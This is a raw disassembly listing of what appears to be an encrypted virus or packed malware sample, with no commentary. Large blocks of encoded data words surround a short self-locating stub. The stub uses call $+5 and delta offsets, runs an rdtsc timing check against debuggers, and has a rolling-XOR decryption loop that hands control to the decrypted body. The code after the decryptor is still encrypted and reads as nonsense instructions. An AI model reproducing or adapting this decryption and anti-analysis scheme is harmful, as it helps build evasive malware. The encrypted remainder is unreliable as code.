5BC4EE64h, 0B455EE63h dd 4DCC3BE4h, 0BA3DF67Bh, 0C831B427h, 0D6E52993h, 9EDD1C1Ch dd 0B2883519h, 0D5678431h, 0FB70CEF4h, 0CDE95AD7h, 0A521A00Bh dd 0C554A328h, 42C57EF3h, 42F93CBFh, 28FD80BAh, 2899A722h dd 9762B29Bh, 6BF3404h, 0FA7D2083h, 0EC0472C7h, 0ADE8EC6Fh dd 55FC56A1h, 434DE66Bh, 887E5CCAh, 329EDE3Bh, 0A15CA9D3h dd 0D59DA093h, 66BBD4E8h, 7DFA7472h, 4E72F908h, 2AED70C5h dd 0E68764E7h, 50A069BDh, 0EDAF657Bh, 0BFB75873h, 2E870C32h dd 88A6C86Bh, 0E9654877h, 0FD05A06Ch, 0C8B98F02h, 0F2F5F87Bh dd 566B996Fh, 59F86AE5h, 0A851E26Fh, 0C7B948E0h, 0B689BB4Ah dd 0EAD2FFB3h, 620A4C8Dh, 17E267E4h, 863FB484h, 7AFC8003h dd 2E417F82h, 5A66EDE1h, 0BD735CE9h, 0C97536DCh, 0BD644E07h dd 54B50E83h, 8CA89C04h, 2216A554h, 0E9114A1h, 2DF00889h dd 0CEF27988h, 0EA6DF045h, 0C414E463h, 575F18EBh, 0C67FF4CAh dd 82B765C9h, 4EF0B401h, 0C49DCE3Bh, 96A9379Eh, 0CABD98F8h dd 4684010Dh, 855F78CDh, 50D1E76Ah, 52DD60E3h, 28C121D7h dd 482DCB73h, 81B81Ah, 9A0656B3h, 0AEA9CFA6h, 961012D3h dd 0AC893AB7h, 0C2F68574h, 0EE71F441h, 97D4E87Bh, 6E3FF92Ah dd 6F4728D0h, 0BE77FCC3h, 7206135Dh, 3E948585h, 6D1D961Ch dd 0B8291F92h, 0A205880Bh, 0C7E609FFh, 0CF69B84h, 54F96D5Fh dd 64EDDC7Eh, 452D8CCFh, 239E5C9h, 85D73481h, 1D3D9582h dd 0D7131CA9h, 3515B519h, 55E704B1h, 7777A0CBh, 0E65FD4ECh dd 51D817C9h, 0CD51E26Fh, 0B644C84Bh, 3DBC4B1Dh, 0AA2D860Bh dd 0EB25A427h, 19906F0Dh, 8609BA37h, 0FFE8003h, 94759CF2h dd 0C90D9714h, 0A126A325h, 7CF5DB56h, 3EC144C7h, 82B64CB3h dd 0A35E8666h, 1AAB1828h, 8E911497h, 53528FFh, 0CEFA7955h dd 0AACF045h, 0D6E8E97Dh, 7757D87Fh, 0C67FF4CCh, 3A3E2483h dd 1E9AB0F3h, 1A43024Ah, 33137CE0h, 8A3BA890h, 0FBF62F61h dd 72C34070h, 66E96CCFh, 0DF2A3397h, 4EE76C5Ch, 62C548CBh dd 0F14E31CBh, 2AAD30B0h, 8E1121D3h, 9966F331h, 96048748h dd 0D17D36BCh, 12307DB6h, 676FB0DBh, 0D66FE4DCh, 41C827F9h dd 0BE41F27Fh, 0C635F83Bh, 0F691CA23h, 1998AAE0h, 6511A22Fh dd 7DBDEE01h, 0F55C761Fh, 0CED46CBh, 0D564934Ch, 51D56EE3h dd 32C84CCFh, 0B138B7B0h, 2EB1028Fh, 568528ABh, 155EEB92h dd 7E8D1093h, 5411B482h, 3DFE0B90h, 0D9C169E4h, 1276E055h dd 0FDAD9CDEh, 49C03F82h, 0B6398A07h, 0DF2D3033h, 1DA42929h dd 1815AE23h, 7F89CC07h, 0F705F300h, 4AB5B9F3h, 822468FBh dd 0FD52ECD7h, 0F2AB5630h, 95A784F6h, 0B23A80DDh, 26A994C7h dd 7C7C22A3h, 8B3A4C3Ch, 64837D42h, 90B9CDC7h, 40AE40D8h dd 0E6F961EAh, 57A2D86Dh, 0C67FF4C4h, 0AA3DC043h, 8566B242h dd 0BBCEF0D3h, 0BD31CF94h, 1DDBBEBh, 483E348Ah, 0E26079FBh dd 67E95AD0h, 7E99EBDAh, 266CDDD3h, 0C9C57EDBh, 86A802h dd 0BA281BB3h, 0E9A11298h, 24AD931Eh, 6894C8Fh, 0D7F7483h dd 0EAB35FAFh, 6132BE6Bh, 0E06614E2h, 4E42D053h, 0BE41C59Eh dd 0B235B5D3h, 0F46CE72Fh, 0A951E56Dh, 0C255BA25h, 17FA8847h dd 76CF4785h, 5531F57Ah, 0D5B264D1h, 8AD66483h, 0CDE13F30h dd 0DA557480h, 0A54ECB42h, 149A943Eh, 549A479Fh, 0EA08999Fh dd 0FD8132B8h, 77FCF039h, 0E65FD38Bh, 257593E8h, 0CE5154E4h dd 37FC204Bh, 0BB243C0h, 0AA1B8F8Fh, 6B8C4C71h, 79E67E4h dd 863FB3B3h, 79F5CA88h, 0A0DA78BDh, 6DE08168h, 56D83C57h dd 10495FD3h, 3DC144C6h, 48AF80Eh, 0A61C2FAFh, 0B69D169Ch dd 8B9EFCABh, 2850829h, 0DD7DBAF2h, 0DC5270F6h, 8E67E767h dd 2DA0B2B3h, 7AF44FB0h, 0BA3DF67Ch, 0E90ABF42h, 0B9A6A727h dd 7D199C1Eh, 3698A91Fh, 7101B238h, 72F4757Eh, 0E66C6FEFh dd 3CDD56DCh, 6B2E6C56h, 4239CDC4h, 76323CBFh, 1EEE1BB1h dd 0EB8CCCF7h, 0AFACE764h, 6BF3333h, 0FA99858Ch, 6B72F477h dd 0E253D7ABh, 0E9D9595Ch, 0CAC6D065h, 0B14D836Ch, 0B23575B9h dd 0AE6E972Fh, 9AD9232Ch, 4E929417h, 96428B09h, 4979F9FCh dd 3ABF70C5h, 613DD118h, 0C72A58EDh, 46FF77F5h, 357DC599h dd 2EB18332h, 2239C1ABh, 0E9A51C9Fh, 0A19959Ch, 0C0010487h dd 79F0F76Eh, 6D69EC6Fh, 9976E125h, 72B98463h, 0FBBA37BFh dd 80060082h, 0A95AC533h, 0A81E64A2h, 12909B1Bh, 0F09BA30h dd 4CC26886h, 55F1FFF7h, 54DA886Eh, 6DD12EDFh, 7CF2B456h dd 3A836C7h, 42B538BBh, 39411BDDh, 979D20A3h, 0CF1AE8D9h dd 40860AA0h, 1EFCC76Fh, 9F6DC64Ch, 0CEA5676Bh, 96DAE9A4h dd 2D28D06Bh, 3FB20358h, 0AE078B97h, 2290234Bh, 7E19AA20h dd 75F26549h, 7E012D66h, 7C80F8FBh, 14E52BC4h, 529A5BEAh dd 0B1EDD6D8h, 4D8CB734h, 0C9478E3Ah, 0E91BB4Ch, 362A8326h dd 0ED6A189Bh, 44627370h, 9A594A02h, 0A091F477h, 0EEEE2858h dd 1EDC5B7Bh, 434DE66Ch, 887E00C2h, 3D8C353Bh, 0A529AC07h dd 0AC2220A6h, 2BB4F217h, 81C3A345h, 34D268BDh, 91ABB6FFh dd 0D60A30Fh, 57D558DBh, 0CFC94CCFh, 64E2BC85h, 0BB4E6374h dd 2293132Dh, 1986F45Eh, 0A8C0A16h, 94D55487h, 0D8A9253h dd 0D0520AFAh, 859D6563h, 0CF545C58h, 98ADC84Bh, 5EC643DAh dd 0AA2DB022h, 0D855C174h, 0C170F472h, 0F47CEF6Ah, 3B84F46Ah dd 3A448BF7h, 9DE55ED4h, 60E2664Ah, 1648D9D3h, 0D6C172F8h dd 32B538A2h, 47FD49FCh, 6DD245C8h, 7DE371F9h, 52F561E3h dd 9F0F950Dh, 8F0A951Fh, 0F589B367h, 3AAA27B2h, 0C649CC5Ch dd 0DF6FA510h, 0DC5EC044h, 0CB57F84Eh, 0F375F569h, 0DD0DF574h dd 81E889EFh, 72E79004h, 3BA6CEFh, 31BE01A1h, 3C8124A2h dd 2EAC3EA2h, 36DC5BDAh, 0C25DD8E4h, 649DB58h, 4195189Bh dd 67E14FEAh, 0B41867EDh, 88188018h, 8B17B812h, 0B335B529h dd 9D4DB534h, 41A909AFh dd 3F61E8C4h, 901334AAh, 0CA79CA23h, 7146957Dh, 0B43E7A9Eh dd 52C5F5FFh, 51C3E50Ch, 9ECB64D1h, 6C85E556h, 16994CF9h dd 0A208BF93h, 46B1028Dh, 22A128AAh, 419876CBh, 35D1856Ch dd 94D504B1h, 678AAF7Fh, 0E65FD333h, 254924E0h, 0F86E80E2h dd 0A8D0374Bh, 0E9398A04h, 0FA983DF0h, 0C8219219h, 0A97B0DE4h dd 7E8A8C39h, 0C1798FFCh, 0E7F174F7h, 54DA086Eh, 0D936DFh dd 7167C52Ch, 0FE4444F1h, 3211BCB4h, 0E6822CAFh, 19F770F3h dd 66907EC7h, 0C285088Bh, 0BCEC0329h, 696DC648h, 5A6E1B9Fh dd 0D255DDB3h, 0F92D49C6h, 37B0C075h, 0AE078B5Fh, 9D553DA6h dd 0C4489C29h, 755D9079h, 483AF292h, 8D0DFBFBh, 635FE8E0h dd 5AB760E3h, 71B5E128h, 0D73A48FDh, 368F07CDh, 2552C830h dd 1EA4BB23h, 6A10919Bh, 35893AB0h, 0ABBE034Ah, 0EA1BA527h dd 86D0173Ah, 2959EA60h, 0FC769EC6h, 0B1814147h, 0B230C3BFh dd 2FE09F2Fh, 0AC22DCA6h, 0DF40C517h, 8D059763h, 0E3062CFFh dd 6ADB4B65h, 0DAEEA462h, 52D55DEFh, 7949C946h, 827E40F5h dd 2EB15B58h, 0D59D6320h, 20A1971Ah, 0A8D1093h, 0FD877197h dd 0C46590FEh, 0E5BBDF6Fh, 2DAC17A2h, 42D45DB6h, 7A45FE74h dd 0B63994A8h, 0A911FBB8h, 0A831CCA2h, 91C7AB1Bh, 71F87BCEh dd 0FE7809E2h, 0ADF142C8h, 64AEDFE4h, 0DBECBF26h, 0FDC24880h dd 0EEC25084h, 1A7453F2h, 1C28FCACh, 74F457FCh, 8D8C606Eh dd 708404F1h, 0CA32779Fh, 0E979B2F8h, 9AECF425h, 0BA22713h dd 43720D6Ch, 0BA0BFF3Bh, 8A653FF4h, 2DE59B3Bh, 9619249Dh dd 45865313h, 0C38C8FECh, 72C346ABh, 5536E713h, 3BE1CC2Ah dd 34ED52A5h, 62E94ABCh, 42E50015h, 5E830C5Fh, 6BA1187Ah dd 995CFB73h, 5ECC318Eh, 0F10900C6h, 0BC32A74Ah, 0D1E0E76Bh dd 5DA623A0h, 831AED50h, 3A4E8709h, 4DCA471Dh, 0F36AFB12h dd 8199AF6Dh, 0B3EE6BE8h, 0B036CB5Ch, 89E9F8F0h, 3AD08F0Ch dd 51AE30B4h, 0AD2A5D5Fh, 0AE127F30h, 0C542BEEEh, 0D45924C2h dd 0CA5AD757h, 0E966E2BEh, 0F461949Ch, 2CB2FB78h, 0F275EE93h dd 190A046Fh, 0DAB51F9Ch, 9351D457h, 0F17C25CAh, 6DD0BC09h dd 0CE2DB030h, 2BAA96D8h, 9223A79Bh, 0E02B056Bh, 20B0BE82h dd 6D35F1F8h, 3C6E68EBh, 30075FE3h, 0F9D6B52h, 3D75C1C8h dd 714238BBh, 26892CB9h, 0BD182FA3h, 0F8911494h, 0D8754C8h dd 0F67A61FBh, 0E22E7B73h, 7EC1445Ah, 5DD1D7FBh, 0FB49CC4Ch dd 9A1DE063h, 0ADB53038h, 1BCDA82Bh, 99E663E1h, 8A0EE991h dd 0BAA40707h, 72F54EC4h, 0EDE12E64h, 9BF670A9h, 8EE250A4h dd 8AC64D20h, 0BFA97636h, 1C92B836h, 12EB27A7h, 13951823h dd 0AC615D8Fh, 0CA82FF64h, 0D8497DE2h, 0D245596Bh, 0E06156EAh dd 346DBA53h, 0AA399C8Eh, 4DD228D3h, 0A9FB29D0h, 78CE62B7h dd 0B69A0126h, 67EE883Dh, 4E72F908h, 6AED70C5h, 7C9565E7h dd 6A5EDD2Ch, 46CA4CF9h, 36C840C3h, 163A9136h, 0DD5A289Dh dd 1C72E760h, 32069D12h, 0FE8104B1h, 0F41DF07Bh, 0BF69EC6Fh dd 0DA5DE60Bh, 8CB98C57h, 48BA37ACh, 80013FBAh, 80A93633h dd 9E179CA4h, 0AA961D93h, 66EB8C39h, 427605F4h, 6EF974C1h dd 6B9068EBh, 6E5CE15Fh, 3ECC50E5h, 0B544B302h, 32B50E83h dd 52A12CAFh, 9920A0B8h, 0B9122AFh, 0BF05B8FFh, 0F64FC4FBh dd 6ACA8476h, 0E85961DAh, 4C21DD5Bh, 0FEC249B8h, 0BA3DC075h dd 0A7453437h, 9AA615ABh, 0E11B9C29h, 42A8139Ah, 7E01B238h dd 8D067F13h, 9B888410h, 2A359F1Ch, 0C5D154D5h, 74FACC56h dd 0BE243FBFh, 0C2AD068Ch, 0E15ED8DEh, 10C59C94h, 0B3020C8Fh dd 0FA4B3F03h, 0ED4DAAFCh, 1F1F00B5h, 545623A0h, 0CA4DD269h dd 0DE658EC6h, 39D5B83Bh, 0A57FFED1h, 0E01EB459h, 5946307h dd 8205BE33h, 3E97CFFh, 0A650F9E7h, 0D3E152D8h, 64EDC06Eh dd 2E44C7CFh, 0C9BD76D3h, 8086313h, 0AFA528A1h, 20891C2Ah dd 0BB28E393h, 0D83E787h, 79F00FDFh, 0E669DA57h, 0D54DE063h dd 0CE517AD3h, 0EA36374Bh, 49D70AD7h, 16B83BCCh, 1B219218h dd 0A9197C9h, 0D098C0Fh, 4CC200B6h, 7EBBFFF7h, 2C1226Ah dd 7D395CDFh, 48BE5899h, 4CC28DF4h, 5A3803AFh, 0ADA91ABFh dd 2C8D482Eh, 85C76697h, 0A7062CB7h, 0F64FEC17h, 82CA7373h dd 0DE61E467h, 0D35DA2D0h, 314AC405h, 3FB637C4h, 0AE078BA3h dd 9AAE2DDCh, 96599C29h, 88799013h, 0C029CF0h, 0FBC551F7h dd 50D6A45Ah, 72AEEBE3h, 0CB2664D6h, 42F37040h, 36B93CFFh dd 325A32C7h, 0E2E8CCF6h, 0F9CCE764h, 2EFA0F83h, 0AB7172A8h dd 0B1D50721h, 7AD06532h, 5F59EA67h, 0FC721CEEh, 0E1E53747h dd 2004B765h, 0A6FD2BA2h, 0F27A023h, 8E27AC9Eh, 506C8E7Eh dd 64CD2A87h, 821D207Bh, 0A11EBE5Ch, 5E9FD381h, 0B1D906CCh dd 0C85CB46h, 2EB134B7h, 27E4A5BBh, 9B100FEAh, 0ABB2F5Bh dd 0EEE98184h, 55F6F84Dh, 0E669EC07h, 0F21ECB63h, 0CE0253DEh dd 47B2C84Bh, 0B60F8077h, 0AA2DB032h, 0DDE6A353h, 32B53813h dd 0D8C7BAFh, 7AFDB63Bh, 1A7174F7h, 180D3AECh, 0C26A328h dd 7505DD58h, 3B2244F1h, 0D99D7332h, 0E224A7A2h, 0F99D169Ch dd 8592FF95h, 877220C0h, 0F64FC4F4h, 0EA6DF070h, 5BEAF013h dd 0D263E797h, 0F9F1414Ch, 3F3EC075h, 0AE078B83h, 0E8AEA02Ah dd 129C170Fh, 0B30DA62Ch, 7D728C4Dh, 73FD3272h, 56A7CADh dd 0DF5660BBh, 4EE76B5Bh, 42EDD0A3h, 3EFB3DBFh, 7AEE31EAh dd 2628B12Dh, 976218ADh, 6BF3404h, 0EA7D0083h, 6372F203h dd 0E253F803h, 53AEDCE9h, 0CA7BE8D8h, 0BE43C447h, 74CBAC4Eh dd 9EA229D8h, 9A1DA015h, 88649413h, 0BA8F3D81h, 0F30E7CC9h dd 6ADB4878h, 5EE124E7h, 555F53AEh, 44638ECDh, 0D14AA215h dd 1CB6BEBEh, 0F4A78269h, 0C4AAEB7Dh, 6EAF9BF7h, 7DD90608h dd 0C44A9CC6h, 6266EC6Fh, 25A21ABDh, 0F1D161A8h, 57BAC87Dh dd 0B60F8785h, 955105CCh, 0BDEA411h, 9223A335h, 0B9610182h dd 0EF708035h, 6EC74B87h, 628F3ABAh, 69BDE920h, 0DF3250E5h dd 3EF77F69h, 0DD18D44h, 0B3562C99h, 1AAB1B8Dh, 30C1A11Ah dd 0B77A08BDh, 0F64FC31Fh, 40F80F25h, 5D61D25Ch, 0E46ABCFEh dd 2E8ACC4Fh, 0BA3DC043h, 2F30DE6Ah, 94123EC6h, 99E9C41Fh dd 9F7915D2h, 0BE848431h, 8D3DFB38h, 0E328631Fh, 5AEB7597h dd 4EC16914h, 5EB048E1h, 12C5BDD9h, 5FDC5CBFh, 0DA4944B4h dd 676AE764h, 0FC5DE48Ah, 2895FF7Ch, 8F8E0B88h, 9A481745h dd 6E4BE809h, 0CA4DD076h, 41E42C27h, 8B4047C4h, 960DE8A4h dd 0A44D15AEh, 0DE9A9421h, 0B884EE03h, 538A7EF9h, 6AED18A5h dd 9A6A6418h, 28758B1h, 7D33D930h, 0FE3E40F5h, 728FB5BFh dd 57F91794h, 125F9F9Ch, 0F577917Bh, 1FEEC78h, 31140784h dd 0E66998D7h, 62EC0B63h, 0CE51D478h, 0C245D5A3h, 0B6197E3Fh dd 0AA2D808Bh, 9E314C27h, 0B6D7981Bh, 878C340Fh, 79158003h dd 0ACF174F7h, 366868C7h, 781450FBh, 36CDA850h, 3E2924DEh dd 0B9B538BBh, 7B9908FBh, 0F71C3A28h, 0EA72CFAh, 0FD64DC63h dd 0F2BB9D80h, 0ED6EF673h, 5C63E166h, 0B3F99FACh, 3815FF6Ah dd 8D004432h, 49h, 15A7h dup(0) dd 5E86000h, 0E8000000h, 53h, 36FF6467h, 64670000h, 2689h dd 3FE8h, 0B1E98100h, 0BDFFFFFFh, 2898h, 0C681F629h, 17h dd 0FC018651h, 2966FCFCh, 0FC0186F0h, 6601C183h, 5FC681h dd 8301ED83h, 0E57700FDh, 58F6459h, 0 ; --------------------------------------------------------------------------- pop esi mov [esp+18h], ecx popa jmp ecx ; --------------------------------------------------------------------------- pop ecx jmp ecx ; --------------------------------------------------------------------------- mov ecx, [esp+10h] xor eax, eax pop dword ptr [ecx+0B8h] retn ; --------------------------------------------------------------------------- call $+5 mov eax, [esp] cld mov [eax+2FCBh], ebx test dword ptr [eax+2886h], 80000000h mov ebx, [esp+4] jz short loc_314420B8 pop ecx mov [eax+2FCFh], esi push edi pop dword ptr [eax+2FD3h] cmp byte ptr [eax+288Ah], 0E8h jnz short loc_314420AF add ebx, [eax+288Bh] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_314420B7 ; --------------------------------------------------------------------------- loc_314420AF: ; CODE XREF: .gda_:314420A0j mov ebx, [eax+288Ch] push dword ptr [ebx] loc_314420B7: ; CODE XREF: .gda_:314420ADj pop ebx loc_314420B8: ; CODE XREF: .gda_:31442089j push ebp mov ebp, eax sub dword ptr [esp+4], 5 sub ebp, 361005h mov edi, [esp+4] lea esi, [ebp+363898h] mov ecx, 0 rep movsb call sub_3144212D mov ecx, eax call sub_3144212D sub eax, ecx jz short loc_31442101 cmp eax, 100h ja short loc_31442101 lea eax, [ebp+3610D4h] mov dl, [eax-10h] call sub_31442131 jmp short loc_31442140 ; --------------------------------------------------------------------------- loc_31442101: ; CODE XREF: .gda_:314420E8j ; .gda_:314420EFj test dword ptr [ebp+36388Bh], 80000000h jz short loc_3144212B lea esi, [ebp+36388Fh] mov edi, [esp+4] movsb movsd mov esi, [ebp+363FD4h] mov edi, [ebp+363FD8h] mov ebx, [ebp+363FD0h] loc_3144212B: ; CODE XREF: .gda_:3144210Bj pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_3144212D proc near ; CODE XREF: .gda_:314420DAp ; .gda_:314420E1p rdtsc retn sub_3144212D endp ; --------------------------------------------------------------------------- db 3Dh ; =============== S U B R O U T I N E ======================================= sub_31442131 proc near ; CODE XREF: .gda_:314420FAp mov dh, dl mov ecx, 27B7h loc_31442138: ; CODE XREF: sub_31442131+Cj xor [eax], dl inc eax add dl, dh loop loc_31442138 retn sub_31442131 endp ; --------------------------------------------------------------------------- loc_31442140: ; CODE XREF: .gda_:314420FFj mov esp, 0CE04B799h xchg eax, ecx sub dl, [ebx-4A08C995h] push 22h wait push ecx out 4Ah, al xchg al, ah add [ebx-6Ch], ecx xor esi, [esi] xor [eax+edx*4], ebp ; --------------------------------------------------------------------------- dd 0F05BA78Fh, 1FBB6F98h, 5B487681h, 0F71F704Eh, 8330EEF3h dd 0A72447FCh, 5A635FC7h, 457A82E1h, 2F06BE08h, 4093FB1Eh dd 71014C74h, 10F66138h, 34A11D7Dh, 0B348914h, 73F57AF6h dd 17AC6E4Fh, 0E32452A2h, 0D49BB2EEh, 0A4C84E11h, 0F41A316Ah dd 0DC175898h, 5B342A88h, 0B6DE9737h, 644F24EEh, 804306C4h dd 155288FEh, 1E6E8BC5h, 1D6B8CC0h, 86EC8599h, 7F354F04h dd 3513BEB7h, 6BEFB275h, 41AFD20Ch, 6692EE2Eh, 8B9E123h dd 75697D16h, 0C68840BCh, 0E764822Dh, 181E5E21h, 338CD61Ah dd 3FD3B9F6h, 824C0C68h, 0A7ABABF1h, 9C5CA360h, 0BDEE96D9h dd 85473CD8h, 0CDC4EAB4h, 6C19CD65h, 750E6B57h, 0D198DAABh dd 483DDB15h, 997CC56Eh, 30C5A3FDh, 5042296Dh, 18DBA874h dd 19B737D6h, 83C3867Fh, 0C2A20698h, 2EFC6E31h, 0EA8DB0A0h dd 651A5719h, 0C4B17137h, 0AD8B8B8Ch, 655C32C3h, 9B259B64h dd 0B4E61AEBh, 88488539h, 0E9C05DC5h, 7005CD3Fh, 6B38026Ch dd 581B0A25h, 58485995h, 830086E3h, 34E7BA15h, 166E2779h dd 74DF945Eh, 10D3F9A9h, 91388A27h, 0F88D45FFh, 68A0B2B0h dd 0E0A364C7h, 0D422D78Ah, 438B7801h, 0B783FBEAh, 5DF236F9h dd 0A4513AEDh, 8A098B6Ch, 29BC12E3h, 6CC0E436h, 1ECB719Dh dd 31EBDDB9h, 47267728h, 0FBE0D6AFh, 138E3606h, 24BC4091h dd 2CECDA22h, 0B51CA668h, 14E1A163h, 8DEB4AD2h, 633B8D85h dd 67B3763Bh, 0E5CD6A47h, 0D89F5E49h, 0CC8F3A95h, 557C4608h dd 0B44101C3h, 2C64EE74h, 9C5F2067h, 0F80316B3h, 84430ACDh dd 90FAFEABh, 6D45A5B9h, 60228EF9h, 0C1E8DA9Ch, 483DF5AFh dd 3DFFC8EDh, 0E664979h, 0CCE79C56h, 18DB9E64h, 0CCDC3BCh dd 59C3EC49h, 0FEDD70DEh, 0D319FBCEh, 2D746213h, 8E2ED5DAh dd 0C4877C36h, 0BA4FBA0Eh, 0AA8732F5h, 0EE6326E9h, 0D81B5E89h dd 0F2DEF1D1h, 0F13F34FEh, 46243C0Ch, 0E9EED9ADh, 6E20181Ch dd 0DF016395h, 4001B561h, 0CE4A397Dh, 28EB984Ah, 1EDF266Ah dd 95589659h, 4F1B187h, 77BA0EBEh, 0DA9890B0h, 226ED29h dd 2B976C26h, 4D044F61h, 0BC497A2Ah, 8BBDB372h, 0D4982ADBh dd 0AEDE91E0h, 74F24EDh, 0B678D444h, 8B2D19BDh, 0EDA4EFC0h dd 5C29DAE6h, 6BC95B12h, 4DE4CABBh, 0B7FACF7Eh, 1AD7E2F0h dd 215B4E69h, 0A95A9A5Dh, 8FDB201h, 0FCD54DCEh, 804CAFCFh dd 0E746E929h, 21981E4Bh, 0A68F3842h, 1736CB11h, 0D770CE8h dd 0A86B2EE8h, 62122668h, 0F6ACE926h, 0C9438766h, 783BFEC1h dd 2BA259D3h, 84114DADh, 6EEB4F10h, 2EA7CEA7h, 9799C00Ch dd 0D2F174FAh, 4E332198h, 772BF661h, 0C0449255h, 0C4488623h dd 0F4DF7A57h, 82A36E31h, 0B6CD3365h, 456C0617h, 0C4B171DBh dd 0F8BFBD59h, 0AC00C29Dh, 0CAB7ADE9h, 0FE9B91DDh, 0E24B6491h dd 7C5550C7h, 705C06D1h, 352780ADh, 0A74B21CBh, 7A340C00h dd 0C55A9989h, 3373B582h, 0A5EBAE70h, 2ACFA2D0h, 1B2F2F59h dd 0EB4C8A4Dh, 153ADBB2h, 0EC996235h, 0F49BE3A4h, 34685A2Bh dd 0E8E11A41h, 2980BD6Fh, 0B0450D1Fh, 0D138EA68h, 9916F6D5h dd 9DA712D5h, 0D34306C9h, 1652BED8h, 1A7B89C4h, 307694CCh dd 5076B1FCh, 414922DAh, 8D04BE81h, 2CD98D21h, 1B893396h dd 0EB809A6Bh, 3EF0A0C4h, 96BFE845h, 0AE26893Bh, 5DA75C16h dd 0D89B5F09h, 456E7982h, 97D76205h, 8FD5AF02h, 5E582EC7h dd 0A0618766h, 0C45316EFh, 22D2F59Ah, 0FD3BC8FAh, 2A498675h dd 1227182Ah, 70632573h, 220BA499h, 0A26A3DAFh, 0B5F38042h dd 0B73BDEADh, 18DE1889h, 9D06A155h, 85FABCAAh, 0F4814603h dd 942A5C44h, 0AFFC4601h, 0F8E7256Bh, 0CA138B8Ch, 0EC2B3E01h dd 0FC3E64A5h, 359C75B9h, 9461218Bh, 0FC12CE54h, 584BFDCAh dd 4EB679B1h, 8C27DC91h, 0A7E42364h, 629A2DC6h, 0AB03F0B2h dd 1C333BF3h, 7FEBAE70h, 27F1379Ah, 852C966Fh, 4F1B163h dd 74016A8h, 86F572CAh, 8AA30C29h, 0BC97301Dh, 0C88F4E10h dd 0BC15868Eh, 3B7F5CA9h, 0F285D529h, 986F4199h, 648621D5h dd 7FBCF913h, 61706F30h, 3979EE87h, 0C9E0B2F4h, 5025EDABh dd 87270E0Eh, 38A3E6D9h, 2CEF9D85h, 20E3A836h, 14D79A5Ch dd 8CB8E51h, 0FCBF8245h, 0F0B35EB2h, 0E4A76A2Dh, 27C80870h dd 0FAB46880h, 6CDAED09h, 4F02FA79h, 25A8C013h, 0AA465370h dd 5AC44D9h, 8471315Fh, 476F7B48h, 7AC7F283h, 2C23E6A9h dd 217CB5F2h, 21799EE1h, 5993ABF3h, 51A5D31Eh, 6582DF01h dd 8D24CE61h, 0CF9A96Fh, 3F9B03C0h, 0A8747A0Bh, 8DD80F73h dd 0B9F2036Bh, 0BAF1197Dh, 0B7F32968h, 0EB0F685Dh, 0AC1B5190h dd 0D2175585h, 94397FB1h, 0E92E7C92h, 157967B1h, 707293D5h dd 54298EEh, 315DBBD5h, 2D42B7F9h, 2E6AB6F9h, 77F7FB1Ah dd 5C8ACB03h, 73ADF200h, 63A0F33Ah, 76848A0Ch, 9DCF1F24h dd 83C21767h, 88F7035Dh, 0B0F63F6Fh, 0ADF90D11h, 0E81A3664h dd 0D1164491h, 0D6242A89h, 0FD2F7F84h, 0E0207D81h, 0F02F63A1h dd 1A64C88Eh, 589ED0h, 191F96CAh, 467BFE1h, 2562B8E5h dd 51BDBEE5h, 45BBD719h, 4FB7C304h, 60A4E30Eh, 619FE334h dd 0BABFE728h, 0BCD6134Bh, 85D50844h, 9F9B2753h, 0A5C92670h dd 0B4C22365h, 0D61E4889h, 0DB0E5A84h, 0F91822A4h, 0FC3A50ADh dd 0FE2E59A8h, 1D7CFEA4h, 46B4C1h, 0D4AB2CCh, 3150DAF8h dd 2C6483E5h, 749AAEF0h, 5C97D818h, 63E7EB08h, 7D8FEA04h dd 6589E238h, 618DE325h, 0F4F61F50h, 0BCDF0B76h, 8CEF0F40h dd 91FB2278h, 0B0E20D0Dh, 0CB095B57h, 0AC015D9Ch, 0F61743AEh dd 0FD2468B8h, 0F00E60BEh, 19780284h, 1C5CA0CDh, 2D4287D8h dd 2A74B8CFh, 257BB3F8h, 4042A8E6h, 5096D531h, 5A89C73Dh dd 5DA6D004h, 60B2DB59h, 73A2E31Bh, 91FD180Eh, 0A3AF1759h dd 0A6CD0359h, 99F23674h, 0A1FB3E70h, 0BC3E256Bh, 0DE1646B6h dd 0C70858BDh, 98286D84h, 0EF206085h, 0B33075ACh, 65EBC8Fh dd 382B9AC2h, 397C8DD7h, 6220A5EAh, 307FAFC3h, 4C9EED81h dd 4983DB33h, 5297D228h, 60A2F834h, 88AFD34h, 0BACBE716h dd 0A4D61A50h, 0E4C20744h, 0BDFE3272h, 0B5DC5265h, 0ADE6327Ah dd 0D11A53A9h, 0C12D41A5h, 0F50B4789h, 0C55373B4h, 0F42667A3h dd 0F5E9797h, 56994FAh, 362383C5h, 2163A8F4h, 244AA2F0h dd 3C9CADE9h, 449AC42Eh, 488EEC08h, 6C959E04h, 79A5F614h dd 7293F23Ah, 98DE0C54h, 9BCE0954h, 0B9F40D71h, 0A4DD5677h dd 0A5E2384Eh, 0D13D5B75h, 0E26F5799h, 0C511659Dh, 0C4326EBCh dd 0ED2861A3h, 323F71B6h, 1541B5CDh, 34429ECCh, 3D78B1D3h dd 344AA1E6h, 3778889h, 4096DF0Fh, 4B8EFD14h, 72B0CB11h dd 53A7D859h, 70A6EF3Fh, 9DC82B24h, 83DD2247h, 93D0034Ah dd 99E3141Dh, 0A1DD3E70h, 0DA303560h, 0C41053AAh, 0A4094584h dd 0E8146AAFh, 0E5097CB0h, 0CE4363A5h, 1147B5C9h, 759BEDFh dd 2F6C87C6h, 3578B9CDh, 3049CAE3h, 569ECECEh, 588CD726h dd 208DC900h, 6687EE13h, 6BAEFA3Eh, 8ED6D431h, 9CD2034Dh dd 8BCA0F60h, 969B2753h, 0A9FA0361h, 0AECA3F7Bh, 0D905559Bh dd 0C7025A90h, 0F730768Bh, 0DE5378BCh, 0ED355DB9h, 116D9BB5h dd 0D5A86C7h, 0D46ABC5h, 546EA8F2h, 1D67BAC3h, 539CABEBh dd 44A0D31Dh, 4389C31Fh, 769AF135h, 789CFB26h, 67ADEF3Bh dd 0B5E42D3Dh, 9ACA1A62h, 0DCEF1751h, 0A3FC3A7Ah, 0A7E83968h dd 0B80F5B6Ah, 0C2015D96h dd 0A017458Ch, 0FC237FBAh, 0EA3F7DBEh, 115E6CBCh, 1541F6DCh dd 17279CCEh, 587FB0C4h, 276CBDE6h, 903B2ECh, 4692CE13h dd 6B9FCB1Fh, 79ACCD09h, 74BDF711h, 4DC7EF21h, 8ADE0A2Fh dd 0ABDB175Bh, 8FE0124Ch, 0B7F23473h, 9BEF2B65h, 0D90B2371h dd 0C41D7FF9h, 0C1095888h, 0FD2B5195h, 0C54F53BBh, 0F22672A7h dd 3B439FD3h, 